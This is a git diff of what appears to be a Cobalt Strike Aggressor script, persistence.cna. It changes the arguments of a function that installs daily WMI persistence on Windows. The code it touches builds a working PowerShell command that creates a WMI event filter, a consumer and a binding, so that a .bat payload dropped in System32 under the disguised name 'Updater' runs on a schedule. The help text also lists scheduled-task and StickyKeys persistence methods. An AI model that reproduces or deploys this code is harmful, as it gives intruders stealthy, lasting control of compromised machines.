diff --git a/persistence.cna b/persistence.cna index ac787d9..13cd148 100644 --- a/persistence.cna +++ b/persistence.cna @@ -434,24 +434,22 @@ sub remWMIOnStart { sub addWMIDaily { if (isAdmin($1)){ if ($5) { - $payloadName = $5; - $taskName = $5; + if($6) { + $taskHour = $5; + $taskMinute = $6; + } + else { + berror($1, "Specify Hour, Minute"); + } + } + if ($7) { + $payloadName = $7; + $taskName = $7; } else { $payloadName = "Updater"; $taskName = "Updater"; } - if ($6) { - if($7) { - $taskHour = $6; - $taskMinute = $7; - } - } - else { - $taskHour = 13; - $taskMinute = 00; - } - $payloadPath = "C:\\Windows\\System32\\" . $payloadName . ".bat"; $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $taskName ."';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour ='" . $taskHour ."' AND TargetInstance.Minute ='" . $taskMinute . "' GROUP WITHIN 60\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $taskName . "';ExecutablePath='" . $payloadPath ."';CommandLineTemplate ='" . $payloadPath . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};"; @@ -583,7 +581,7 @@ Available methods: *SchTasks OnStart *SchTasks OnLogon *WMI OnStart - *WMI Daily + *WMI Daily [Hour] [Minute] **linkinfo *StickyKeys